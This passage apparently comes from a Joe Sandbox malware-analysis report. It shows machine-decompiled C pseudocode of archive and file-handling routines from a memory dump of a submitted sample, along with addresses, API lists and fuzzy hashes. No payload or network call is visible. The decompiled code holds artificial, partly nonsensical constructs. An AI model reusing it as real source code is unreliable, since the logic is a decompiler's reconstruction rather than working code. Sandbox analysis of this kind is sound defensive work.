						_t182 = 0;
						goto L12;
					}
					_t107 = _t107 - 1;
					__eflags = _t107;
					if(_t107 == 0) {
						 *((intOrPtr*)(_t179 + 0x48)) = 2;
						goto L17;
					}
					_t121 = _t107 - 1;
					__eflags = _t121;
					if(_t121 == 0) {
						 *((intOrPtr*)(_t179 + 0x48)) = 3;
						goto L19;
					}
					_t107 = _t121 == 1;
					__eflags = _t121 == 1;
					if(_t121 == 1) {
						_t182 = 0x80004004;
					} else {
						_t182 = 0x80004005;
					}
					goto L12;
				} else {
					_t182 = _t107;
					L12:
					_push( *((intOrPtr*)(_t183 - 0x24)));
					goto L13;
				}
			}

























                                                                                                    0x003c44c9
                                                                                                    0x003c44d9
                                                                                                    0x003c44df
                                                                                                    0x003c44e2
                                                                                                    0x003c44ea
                                                                                                    0x003c44ef
                                                                                                    0x003c44f2
                                                                                                    0x003c44fa
                                                                                                    0x003c44fe
                                                                                                    0x003c4505
                                                                                                    0x003c473a
                                                                                                    0x003c473c
                                                                                                    0x003c473e
                                                                                                    0x003c47b4
                                                                                                    0x003c47ba
                                                                                                    0x003c47bc
                                                                                                    0x003c47c2
                                                                                                    0x003c47c2
                                                                                                    0x003c47c4
                                                                                                    0x003c47ca
                                                                                                    0x003c47d2
                                                                                                    0x003c47d2
                                                                                                    0x003c4742
                                                                                                    0x003c4747
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c474d
                                                                                                    0x003c4752
                                                                                                    0x003c4755
                                                                                                    0x003c4759
                                                                                                    0x003c475e
                                                                                                    0x003c4761
                                                                                                    0x003c4761
                                                                                                    0x003c476b
                                                                                                    0x003c4773
                                                                                                    0x003c4782
                                                                                                    0x003c4786
                                                                                                    0x003c478b
                                                                                                    0x003c478d
                                                                                                    0x003c478f
                                                                                                    0x003c4792
                                                                                                    0x003c4795
                                                                                                    0x003c479a
                                                                                                    0x003c479d
                                                                                                    0x003c479d
                                                                                                    0x003c4795
                                                                                                    0x003c47ad
                                                                                                    0x003c47b3
                                                                                                    0x00000000
                                                                                                    0x003c47b3
                                                                                                    0x003c450b
                                                                                                    0x003c4511
                                                                                                    0x003c4721
                                                                                                    0x003c4721
                                                                                                    0x003c4721
                                                                                                    0x003c4723
                                                                                                    0x003c4726
                                                                                                    0x003c472b
                                                                                                    0x003c472c
                                                                                                    0x00000000
                                                                                                    0x003c472c
                                                                                                    0x003c4519
                                                                                                    0x003c4608
                                                                                                    0x003c4608
                                                                                                    0x003c460b
                                                                                                    0x003c460e
                                                                                                    0x003c464a
                                                                                                    0x003c464d
                                                                                                    0x003c46c1
                                                                                                    0x003c46c6
                                                                                                    0x003c46c8
                                                                                                    0x003c46e5
                                                                                                    0x003c46e7
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c46ef
                                                                                                    0x003c46f4
                                                                                                    0x003c46f6
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c46fc
                                                                                                    0x003c4702
                                                                                                    0x003c4705
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c470b
                                                                                                    0x003c470c
                                                                                                    0x003c4712
                                                                                                    0x003c4714
                                                                                                    0x003c4719
                                                                                                    0x003c471b
                                                                                                    0x003c462d
                                                                                                    0x003c462d
                                                                                                    0x00000000
                                                                                                    0x003c462d
                                                                                                    0x00000000
                                                                                                    0x003c471b
                                                                                                    0x003c46ca
                                                                                                    0x003c46cf
                                                                                                    0x003c46d1
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c46d7
                                                                                                    0x003c46d8
                                                                                                    0x00000000
                                                                                                    0x003c46d8
                                                                                                    0x003c4653
                                                                                                    0x003c465b
                                                                                                    0x003c4664
                                                                                                    0x003c4666
                                                                                                    0x003c467d
                                                                                                    0x003c4682
                                                                                                    0x003c4684
                                                                                                    0x003c46b4
                                                                                                    0x00000000
                                                                                                    0x003c46b4
                                                                                                    0x003c4686
                                                                                                    0x003c468e
                                                                                                    0x003c468f
                                                                                                    0x003c4692
                                                                                                    0x003c4698
                                                                                                    0x003c4699
                                                                                                    0x003c469e
                                                                                                    0x003c469e
                                                                                                    0x003c46a0
                                                                                                    0x003c46a2
                                                                                                    0x003c46a4
                                                                                                    0x003c46a4
                                                                                                    0x003c46a9
                                                                                                    0x003c45c7
                                                                                                    0x003c45cf
                                                                                                    0x00000000
                                                                                                    0x003c45d4
                                                                                                    0x003c4668
                                                                                                    0x003c466b
                                                                                                    0x003c4671
                                                                                                    0x00000000
                                                                                                    0x003c4671
                                                                                                    0x003c4617
                                                                                                    0x003c4619
                                                                                                    0x003c463e
                                                                                                    0x00000000
                                                                                                    0x003c463e
                                                                                                    0x003c461b
                                                                                                    0x003c461e
                                                                                                    0x003c4624
                                                                                                    0x003c4629
                                                                                                    0x003c462b
                                                                                                    0x003c4634
                                                                                                    0x00000000
                                                                                                    0x003c4634
                                                                                                    0x00000000
                                                                                                    0x003c462b
                                                                                                    0x003c452e
                                                                                                    0x003c453c
                                                                                                    0x003c4540
                                                                                                    0x003c4548
                                                                                                    0x003c454c
                                                                                                    0x003c4564
                                                                                                    0x003c4566
                                                                                                    0x003c457a
                                                                                                    0x003c4581
                                                                                                    0x003c4585
                                                                                                    0x003c459c
                                                                                                    0x003c459f
                                                                                                    0x003c45a3
                                                                                                    0x003c45ac
                                                                                                    0x003c45ac
                                                                                                    0x003c45ae
                                                                                                    0x003c45fc
                                                                                                    0x003c45ff
                                                                                                    0x003c4602
                                                                                                    0x00000000
                                                                                                    0x003c4607
                                                                                                    0x003c45b0
                                                                                                    0x003c45b0
                                                                                                    0x003c45b1
                                                                                                    0x003c45f5
                                                                                                    0x00000000
                                                                                                    0x003c45f5
                                                                                                    0x003c45b3
                                                                                                    0x003c45b3
                                                                                                    0x003c45b4
                                                                                                    0x003c45f1
                                                                                                    0x003c45f1
                                                                                                    0x00000000
                                                                                                    0x003c45f1
                                                                                                    0x003c45b6
                                                                                                    0x003c45b6
                                                                                                    0x003c45b7
                                                                                                    0x003c45ea
                                                                                                    0x00000000
                                                                                                    0x003c45ea
                                                                                                    0x003c45b9
                                                                                                    0x003c45b9
                                                                                                    0x003c45ba
                                                                                                    0x003c45e1
                                                                                                    0x00000000
                                                                                                    0x003c45e1
                                                                                                    0x003c45bc
                                                                                                    0x003c45bc
                                                                                                    0x003c45bd
                                                                                                    0x003c45da
                                                                                                    0x003c45bf
                                                                                                    0x003c45bf
                                                                                                    0x003c45bf
                                                                                                    0x00000000
                                                                                                    0x003c45a5
                                                                                                    0x003c45a5
                                                                                                    0x003c45c4
                                                                                                    0x003c45c4
                                                                                                    0x00000000
                                                                                                    0x003c45c4

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003C44C9
                                                                                                      • Part of subcall function 003B695D: __EH_prolog.LIBCMT ref: 003B6962
                                                                                                      • Part of subcall function 003B1E40: free.MSVCRT(?,003D6B41,00000000,00000000,00000001,?,003B10EB), ref: 003B1E44
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2654054672-0
                                                                                                    • Opcode ID: fc1bc7e6dfe3f831f0b8114405b5c62742ea0123a3c4a71f8eca1e8c245c8adc
                                                                                                    • Instruction ID: e6bc0e7ff4c7a285c09580c8d7e6ee0684b423d4324bbb66793b9b6de9661272
                                                                                                    • Opcode Fuzzy Hash: fc1bc7e6dfe3f831f0b8114405b5c62742ea0123a3c4a71f8eca1e8c245c8adc
                                                                                                    • Instruction Fuzzy Hash: 3191E1319002059FCF27EBA4C8A1FEEBBB6AF46344F14402CEA52EB652DB319D55CB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003FC537 Relevance: 3.2, APIs: 2, Instructions: 206COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 87%
                                                                                                    			E003FC537(char** __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t121;
				void* _t122;
				intOrPtr _t127;
				char** _t129;
				intOrPtr _t132;
				intOrPtr _t133;
				char** _t144;
				intOrPtr _t149;
				signed int _t150;
				void* _t155;
				signed int _t191;
				void* _t196;
				signed int _t197;
				char* _t199;
				char** _t201;
				void* _t203;
				void* _t210;

				_t210 = __eflags;
				E0041F1B0(0x427932, _t203);
				_t201 = __ecx;
				_push(_t196);
				 *(_t203 - 0x1c) = __ecx;
				E003F813E(_t203 - 0xa0);
				 *(_t203 - 4) = 0;
				 *((intOrPtr*)(_t203 - 0x2c)) = 0;
				 *((intOrPtr*)(_t203 - 0x28)) = 0;
				 *((intOrPtr*)(_t203 - 0x24)) = 0;
				 *(_t203 - 4) = 1;
				E003FD423(_t203 - 0x44);
				 *(_t203 - 4) = 2;
				E003FD423(_t203 - 0x38);
				 *(_t203 - 4) = 3;
				E003FC27D(0, __ecx, __edx, _t196, __ecx, _t210, 0,  *((intOrPtr*)(_t203 + 0x10)), _t203 - 0xa0, _t203 - 0x2c, _t203 - 0x44);
				L003F3DA9(_t203 - 0x100, _t210,  *((intOrPtr*)(__ecx + 0x80)));
				_t197 = 0;
				_t211 =  *((intOrPtr*)(_t203 - 0x9c));
				 *(_t203 - 4) = 4;
				 *(_t203 - 0x14) = 0;
				if( *((intOrPtr*)(_t203 - 0x9c)) <= 0) {
					L23:
					_t121 =  *((intOrPtr*)(_t203 - 0x98));
					if(_t121 != 0) {
						_t201[0x1e] =  &(_t201[0x1e][ *((intOrPtr*)(_t121 +  *(_t203 - 0xa0) * 8))]);
						asm("adc [esi+0x7c], eax");
					}
					 *(_t203 - 4) = 3;
					_t122 = L003F774B(_t203 - 0x100); // executed
					E003B1E40(E003B1E40(E003B1E40(_t122,  *((intOrPtr*)(_t203 - 0x38))),  *((intOrPtr*)(_t203 - 0x44))),  *((intOrPtr*)(_t203 - 0x2c)));
					 *(_t203 - 4) =  *(_t203 - 4) | 0xffffffff;
					L003F7FF0(_t203 - 0xa0);
					_t127 = 0;
					L26:
					 *[fs:0x0] =  *((intOrPtr*)(_t203 - 0xc));
					return _t127;
				}
				while(1) {
					_t129 = L003BFF16( *((intOrPtr*)(_t203 + 0x14)), _t211);
					_t175 = _t129;
					 *(_t203 - 0x18) = _t129;
					_t191 = ( *( *((intOrPtr*)(_t203 - 0x6c)) + _t197) & 0x000000ff) +  *((intOrPtr*)( *((intOrPtr*)(_t203 - 0x74)) + _t197 * 4));
					_t132 =  *((intOrPtr*)(_t203 - 0x78));
					_t199 =  *(_t132 + _t191 * 8);
					_t133 =  *((intOrPtr*)(_t132 + 4 + _t191 * 8));
					if(_t199 != _t199 || 0 != _t133) {
						break;
					}
					E003B421F(_t175, _t199);
					_push(0x14);
					_t144 = E003B1E0C();
					if(_t144 == 0) {
						_t201 = 0;
						__eflags = 0;
					} else {
						_t144[1] = 0;
						 *_t144 = "L`?";
						_t201 = _t144;
					}
					_t215 = _t201;
					 *(_t203 - 0x48) = _t201;
					if(_t201 != 0) {
						( *_t201)[4](_t201);
					}
					 *(_t203 - 4) = 5;
					_t201[4] = 0;
					_t201[2] =  *( *(_t203 - 0x18));
					_t201[3] = _t199;
					 *((char*)(_t203 - 0xd)) = 0;
					asm("adc ecx, [ebp+0xc]");
					_t183 = _t203 - 0x100;
					_t149 = E003F3F02(_t203 - 0x100, _t215,  *( *(_t203 - 0x1c)),  *((intOrPtr*)( *((intOrPtr*)(_t203 + 0x10)))) +  *((intOrPtr*)(_t203 + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t203 + 0x10)) + 4)), _t203 - 0xa0,  *(_t203 - 0x14), 0, _t201, 0, 0, _t203 - 0xd,  *((intOrPtr*)(_t203 + 0x18)),  *((intOrPtr*)(_t203 + 0x1c)),  *((intOrPtr*)(_t203 + 0x20)),  *((intOrPtr*)(_t203 + 0x24)), 0, 1, 0, 0); // executed
					 *((intOrPtr*)(_t203 - 0x20)) = _t149;
					if(_t149 != 0) {
						L28:
						__eflags = _t201;
						 *(_t203 - 4) = 4;
						if(_t201 != 0) {
							( *_t201)[8](_t201);
						}
						 *(_t203 - 4) = 3;
						E003B1E40(E003B1E40(E003B1E40(L003F774B(_t203 - 0x100),  *((intOrPtr*)(_t203 - 0x38))),  *((intOrPtr*)(_t203 - 0x44))),  *((intOrPtr*)(_t203 - 0x2c)));
						 *(_t203 - 4) =  *(_t203 - 4) | 0xffffffff;
						L003F7FF0(_t203 - 0xa0);
						_t127 =  *((intOrPtr*)(_t203 - 0x20));
						goto L26;
					} else {
						if( *((intOrPtr*)(_t203 - 0xd)) != 0) {
							( *(_t203 - 0x1c))[0xf] = 1;
						}
						if(_t199 != _t201[4]) {
							E003FADE3(_t183);
						}
						_t150 =  *(_t203 - 0x14);
						if(_t150 <  *((intOrPtr*)(_t203 - 0x90)) &&  *((intOrPtr*)( *((intOrPtr*)(_t203 - 0x94)) + _t150)) != 0) {
							 *(_t203 - 0x18) =  *((intOrPtr*)(_t203 - 0x88)) + _t150 * 4;
							_t155 = E0041E1B0( *( *(_t203 - 0x18)), _t199);
							_t187 =  *(_t203 - 0x18);
							if(_t155 !=  *( *(_t203 - 0x18))) {
								E003FADE3(_t187);
							}
						}
						 *(_t203 - 4) = 4;
						if(_t201 != 0) {
							( *_t201)[8](_t201);
						}
						 *(_t203 - 0x14) =  *(_t203 - 0x14) + 1;
						if( *(_t203 - 0x14) <  *((intOrPtr*)(_t203 - 0x9c))) {
							_t197 =  *(_t203 - 0x14);
							continue;
						} else {
							_t201 =  *(_t203 - 0x1c);
							goto L23;
						}
					}
				}
				_push(0x438128);
				_push(_t203 + 0x13);
				L0041F1D0();
				goto L28;
			}























                                                                                                    0x003fc537
                                                                                                    0x003fc53c
                                                                                                    0x003fc549
                                                                                                    0x003fc54b
                                                                                                    0x003fc552
                                                                                                    0x003fc555
                                                                                                    0x003fc55c
                                                                                                    0x003fc55f
                                                                                                    0x003fc562
                                                                                                    0x003fc565
                                                                                                    0x003fc56b
                                                                                                    0x003fc56f
                                                                                                    0x003fc577
                                                                                                    0x003fc57b
                                                                                                    0x003fc591
                                                                                                    0x003fc599
                                                                                                    0x003fc5ab
                                                                                                    0x003fc5b0
                                                                                                    0x003fc5b2
                                                                                                    0x003fc5b8
                                                                                                    0x003fc5bc
                                                                                                    0x003fc5bf
                                                                                                    0x003fc703
                                                                                                    0x003fc703
                                                                                                    0x003fc70b
                                                                                                    0x003fc71a
                                                                                                    0x003fc71d
                                                                                                    0x003fc71d
                                                                                                    0x003fc726
                                                                                                    0x003fc72a
                                                                                                    0x003fc742
                                                                                                    0x003fc747
                                                                                                    0x003fc754
                                                                                                    0x003fc759
                                                                                                    0x003fc75b
                                                                                                    0x003fc761
                                                                                                    0x003fc769
                                                                                                    0x003fc769
                                                                                                    0x003fc5ca
                                                                                                    0x003fc5cd
                                                                                                    0x003fc5d2
                                                                                                    0x003fc5d7
                                                                                                    0x003fc5e1
                                                                                                    0x003fc5e4
                                                                                                    0x003fc5e7
                                                                                                    0x003fc5ec
                                                                                                    0x003fc5f0
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003fc5ff
                                                                                                    0x003fc604
                                                                                                    0x003fc606
                                                                                                    0x003fc60e
                                                                                                    0x003fc61d
                                                                                                    0x003fc61d
                                                                                                    0x003fc610
                                                                                                    0x003fc610
                                                                                                    0x003fc613
                                                                                                    0x003fc619
                                                                                                    0x003fc619
                                                                                                    0x003fc61f
                                                                                                    0x003fc621
                                                                                                    0x003fc624
                                                                                                    0x003fc629
                                                                                                    0x003fc629
                                                                                                    0x003fc63a
                                                                                                    0x003fc643
                                                                                                    0x003fc649
                                                                                                    0x003fc64f
                                                                                                    0x003fc655
                                                                                                    0x003fc674
                                                                                                    0x003fc67a
                                                                                                    0x003fc680
                                                                                                    0x003fc687
                                                                                                    0x003fc68a
                                                                                                    0x003fc780
                                                                                                    0x003fc780
                                                                                                    0x003fc782
                                                                                                    0x003fc786
                                                                                                    0x003fc78b
                                                                                                    0x003fc78b
                                                                                                    0x003fc794
                                                                                                    0x003fc7b0
                                                                                                    0x003fc7b5
                                                                                                    0x003fc7c2
                                                                                                    0x003fc7c7
                                                                                                    0x00000000
                                                                                                    0x003fc690
                                                                                                    0x003fc693
                                                                                                    0x003fc698
                                                                                                    0x003fc698
                                                                                                    0x003fc69f
                                                                                                    0x003fc6a1
                                                                                                    0x003fc6a1
                                                                                                    0x003fc6a6
                                                                                                    0x003fc6af
                                                                                                    0x003fc6cc
                                                                                                    0x003fc6cf
                                                                                                    0x003fc6d4
                                                                                                    0x003fc6d9
                                                                                                    0x003fc6db
                                                                                                    0x003fc6db
                                                                                                    0x003fc6d9
                                                                                                    0x003fc6e2
                                                                                                    0x003fc6e6
                                                                                                    0x003fc6eb
                                                                                                    0x003fc6eb
                                                                                                    0x003fc6ee
                                                                                                    0x003fc6fa
                                                                                                    0x003fc5c7
                                                                                                    0x00000000
                                                                                                    0x003fc700
                                                                                                    0x003fc700
                                                                                                    0x00000000
                                                                                                    0x003fc700
                                                                                                    0x003fc6fa
                                                                                                    0x003fc68a
                                                                                                    0x003fc76f
                                                                                                    0x003fc77a
                                                                                                    0x003fc77b
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003FC53C
                                                                                                    • _CxxThrowException.MSVCRT(?,00438128), ref: 003FC77B
                                                                                                      • Part of subcall function 003B1E0C: malloc.MSVCRT ref: 003B1E1F
                                                                                                      • Part of subcall function 003B1E0C: _CxxThrowException.MSVCRT(?,00430098), ref: 003B1E39
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionThrow$H_prologmalloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 3044594480-0
                                                                                                    • Opcode ID: 703a3633d9616361a07c6b23c1f9ba4f65898fcc674d28d08d2758053089e71a
                                                                                                    • Instruction ID: d0ecdacbeb5ac1a1d1255e6793e88e1ca49c4326e6df70c191abb9fb011b0615
                                                                                                    • Opcode Fuzzy Hash: 703a3633d9616361a07c6b23c1f9ba4f65898fcc674d28d08d2758053089e71a
                                                                                                    • Instruction Fuzzy Hash: 7F915C7190024DDFCF22EFA8C991AEEBBB5BF09304F144099E645A7252CB34AE45DF61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003C5D8C Relevance: 3.1, APIs: 2, Instructions: 138COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 97%
                                                                                                    			E003C5D8C() {
				intOrPtr _t66;
				intOrPtr* _t67;
				intOrPtr* _t68;
				intOrPtr* _t69;
				intOrPtr _t72;
				intOrPtr* _t73;
				intOrPtr _t75;
				intOrPtr* _t84;
				long _t96;
				intOrPtr _t98;
				struct _SECURITY_DESCRIPTOR* _t117;
				void* _t119;
				void* _t121;

				E0041F1B0(0x423df0, _t119);
				_t117 =  *(_t119 + 8);
				 *((intOrPtr*)(_t119 - 4)) = 0;
				 *((intOrPtr*)(_t119 - 0x10)) = _t121 - 0xc;
				if( *((intOrPtr*)(_t117 + 0x74)) == 0) {
					__eflags =  *((intOrPtr*)(_t117 + 0x138));
					if(__eflags != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t117 + 0x130)) + 0x1c)))) + 0xc))( *((intOrPtr*)(_t117 + 0xb2)),  *((intOrPtr*)(_t117 + 0xb0)), _t117 + 0x80);
						_t98 =  *((intOrPtr*)(_t117 + 0x130));
						 *((intOrPtr*)(_t117 + 0x108)) =  *((intOrPtr*)(_t98 + 0x10));
						 *((intOrPtr*)(_t117 + 0x10c)) =  *((intOrPtr*)(_t98 + 0x14));
						 *((char*)(_t117 + 0x3b)) = 1;
						E003C53B4(_t98);
						 *((char*)(_t117 + 0x138)) = 0;
					}
					_t66 = E003C5BC1(_t117, __eflags); // executed
					__eflags = _t66;
					if(_t66 == 0) {
						__eflags =  *((intOrPtr*)(_t117 + 0x3e));
						if( *((intOrPtr*)(_t117 + 0x3e)) != 0) {
							L16:
							__eflags =  *((intOrPtr*)(_t117 + 0x3b));
							if( *((intOrPtr*)(_t117 + 0x3b)) != 0) {
								L18:
								__eflags =  *((intOrPtr*)(_t117 + 0xb0));
								_t67 = _t117 + 0x1a8;
								if( *((intOrPtr*)(_t117 + 0xb0)) == 0) {
									_t67 = _t117 + 0x1a0;
								}
								 *_t67 =  *_t67 +  *((intOrPtr*)(_t117 + 0x108));
								asm("adc [eax+0x4], edx");
								L21:
								__eflags =  *((intOrPtr*)(_t117 + 0xb2));
								if( *((intOrPtr*)(_t117 + 0xb2)) == 0) {
									__eflags =  *((intOrPtr*)(_t117 + 0xb0));
									_t68 = _t117 + 0x198;
									if( *((intOrPtr*)(_t117 + 0xb0)) == 0) {
										_t68 = _t117 + 0x190;
									}
								} else {
									_t68 = _t117 + 0x188;
								}
								 *_t68 =  *_t68 + 1;
								asm("adc [eax+0x4], ebx");
								__eflags =  *((intOrPtr*)(_t117 + 0x38));
								if( *((intOrPtr*)(_t117 + 0x38)) != 0) {
									E003C5D3C(_t117);
								}
								_t69 =  *((intOrPtr*)(_t117 + 0x50));
								__eflags =  *((intOrPtr*)(_t117 + 0x36));
								_t66 =  *((intOrPtr*)( *_t69 + 0x20))(_t69,  *((intOrPtr*)(_t119 + 0xc)), 0 |  *((intOrPtr*)(_t117 + 0x36)) != 0x00000000);
								goto L28;
							}
							L003C397E(_t117);
							__eflags =  *((intOrPtr*)(_t117 + 0x3b));
							if( *((intOrPtr*)(_t117 + 0x3b)) == 0) {
								goto L21;
							}
							goto L18;
						}
						__eflags =  *((intOrPtr*)(_t117 + 0x31));
						if( *((intOrPtr*)(_t117 + 0x31)) == 0) {
							goto L16;
						}
						__eflags =  *((intOrPtr*)(_t117 + 0x20));
						if( *((intOrPtr*)(_t117 + 0x20)) == 0) {
							goto L16;
						}
						_t72 =  *((intOrPtr*)(_t117 + 0x1c));
						__eflags =  *((intOrPtr*)(_t72 + 8));
						if( *((intOrPtr*)(_t72 + 8)) == 0) {
							goto L16;
						}
						_t73 =  *((intOrPtr*)(_t72 + 8));
						 *((intOrPtr*)( *_t73 + 0x10))(_t73,  *((intOrPtr*)(_t117 + 0x104)), 0x3e, _t119 + 8, _t119 - 0x14, _t119 - 0x18);
						_t107 =  *((intOrPtr*)(_t119 - 0x14));
						__eflags =  *((intOrPtr*)(_t119 - 0x14));
						if( *((intOrPtr*)(_t119 - 0x14)) == 0) {
							goto L16;
						}
						__eflags =  *((intOrPtr*)(_t119 - 0x18)) - 1;
						if( *((intOrPtr*)(_t119 - 0x18)) == 1) {
							_t75 = L003DDA7F( *(_t119 + 8), _t107);
							__eflags = _t75;
							if(_t75 != 0) {
								__eflags =  *((intOrPtr*)(_t117 + 0x170));
								_t96 = 7;
								if( *((intOrPtr*)(_t117 + 0x170)) != 0) {
									_t96 = 0xf;
								}
								SetFileSecurityW( *(_t117 + 0xc0), _t96,  *(_t119 + 8));
							}
							goto L16;
						}
						_t66 = 0x80004005;
					}
					goto L28;
				} else {
					L003C397E(_t117);
					_t84 =  *((intOrPtr*)(_t117 + 0x74));
					_t66 =  *((intOrPtr*)( *_t84 + 0x18))(_t84,  *((intOrPtr*)(_t119 + 0xc)), 0 |  *((intOrPtr*)(_t117 + 0x36)) != 0x00000000,  *((intOrPtr*)(_t117 + 0x108)),  *((intOrPtr*)(_t117 + 0x10c)));
					L28:
					 *[fs:0x0] =  *((intOrPtr*)(_t119 - 0xc));
					return _t66;
				}
			}
















                                                                                                    0x003c5d91
                                                                                                    0x003c5d9b
                                                                                                    0x003c5da1
                                                                                                    0x003c5da7
                                                                                                    0x003c5daa
                                                                                                    0x003c5dd9
                                                                                                    0x003c5ddf
                                                                                                    0x003c5e01
                                                                                                    0x003c5e04
                                                                                                    0x003c5e10
                                                                                                    0x003c5e16
                                                                                                    0x003c5e1c
                                                                                                    0x003c5e20
                                                                                                    0x003c5e25
                                                                                                    0x003c5e25
                                                                                                    0x003c5e2d
                                                                                                    0x003c5e32
                                                                                                    0x003c5e34
                                                                                                    0x003c5e3a
                                                                                                    0x003c5e3d
                                                                                                    0x003c5eb0
                                                                                                    0x003c5eb0
                                                                                                    0x003c5eb3
                                                                                                    0x003c5ec1
                                                                                                    0x003c5ec1
                                                                                                    0x003c5ec7
                                                                                                    0x003c5ecd
                                                                                                    0x003c5ecf
                                                                                                    0x003c5ecf
                                                                                                    0x003c5ee1
                                                                                                    0x003c5ee3
                                                                                                    0x003c5ee6
                                                                                                    0x003c5ee6
                                                                                                    0x003c5eec
                                                                                                    0x003c5ef6
                                                                                                    0x003c5efc
                                                                                                    0x003c5f02
                                                                                                    0x003c5f04
                                                                                                    0x003c5f04
                                                                                                    0x003c5eee
                                                                                                    0x003c5eee
                                                                                                    0x003c5eee
                                                                                                    0x003c5f0a
                                                                                                    0x003c5f0d
                                                                                                    0x003c5f10
                                                                                                    0x003c5f13
                                                                                                    0x003c5f17
                                                                                                    0x003c5f17
                                                                                                    0x003c5f1c
                                                                                                    0x003c5f21
                                                                                                    0x003c5f2e
                                                                                                    0x00000000
                                                                                                    0x003c5f2e
                                                                                                    0x003c5eb7
                                                                                                    0x003c5ebc
                                                                                                    0x003c5ebf
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c5ebf
                                                                                                    0x003c5e3f
                                                                                                    0x003c5e42
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c5e44
                                                                                                    0x003c5e47
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c5e49
                                                                                                    0x003c5e4c
                                                                                                    0x003c5e4f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c5e54
                                                                                                    0x003c5e6b
                                                                                                    0x003c5e6e
                                                                                                    0x003c5e71
                                                                                                    0x003c5e73
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c5e75
                                                                                                    0x003c5e79
                                                                                                    0x003c5e88
                                                                                                    0x003c5e8d
                                                                                                    0x003c5e8f
                                                                                                    0x003c5e91
                                                                                                    0x003c5e99
                                                                                                    0x003c5e9a
                                                                                                    0x003c5e9e
                                                                                                    0x003c5e9e
                                                                                                    0x003c5eaa
                                                                                                    0x003c5eaa
                                                                                                    0x00000000
                                                                                                    0x003c5e8f
                                                                                                    0x003c5e7b
                                                                                                    0x003c5e7b
                                                                                                    0x00000000
                                                                                                    0x003c5dac
                                                                                                    0x003c5dae
                                                                                                    0x003c5db9
                                                                                                    0x003c5dd1
                                                                                                    0x003c5f3e
                                                                                                    0x003c5f43
                                                                                                    0x003c5f4c
                                                                                                    0x003c5f4c

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: ddeaee99732e2e3c5804751412ff2bde938f14e67f4b505c356fd7d5f1a00293
                                                                                                    • Instruction ID: 8982c08ae08b80c8f039c552fd2e6312597392ede28d91b2754d78f80a807644
                                                                                                    • Opcode Fuzzy Hash: ddeaee99732e2e3c5804751412ff2bde938f14e67f4b505c356fd7d5f1a00293
                                                                                                    • Instruction Fuzzy Hash: 20516C71505B80AFDB26CB70C490FEABBA6BF45304F59885EE19A8B611C730BE84CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

